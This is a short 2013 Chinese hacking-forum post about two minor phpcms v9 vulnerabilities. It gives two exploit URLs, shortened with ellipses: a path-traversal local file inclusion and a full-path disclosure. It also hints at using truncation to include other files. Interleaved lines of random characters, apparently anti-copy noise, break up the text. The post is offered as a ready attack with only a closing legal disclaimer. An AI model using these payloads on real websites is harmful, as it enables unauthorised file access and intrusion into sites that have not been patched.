中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
1 E9 T. L# }: \1 d* [: Q/ j$ L/ V
* _, Q" E# x3 @4 q
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
& l2 P* p/ V/ J, e; p L; q' H
' H3 W+ r( C. X+ u- G! Q
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
! Z/ S! o; N3 Z: Z( E' s4 y9 U
& T! P# v5 y! H" e& G! m1 h- k
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
; S- Z/ Q6 C. ^, d$ C6 e
3 \" A0 V0 i& L7 w: o3 d' ^' `2 x
#暴路径
% k ~5 K$ s0 G$ v8 G
$ {1 f. X) f, f# o9 ]
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
1 a0 M* a( }' Z$ o" @0 B7 c
# D& ~5 b* o( O4 @" i+ F
" H& o( t: k! V1 Z& `- X
2 S: r: F" p* o# v& G
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2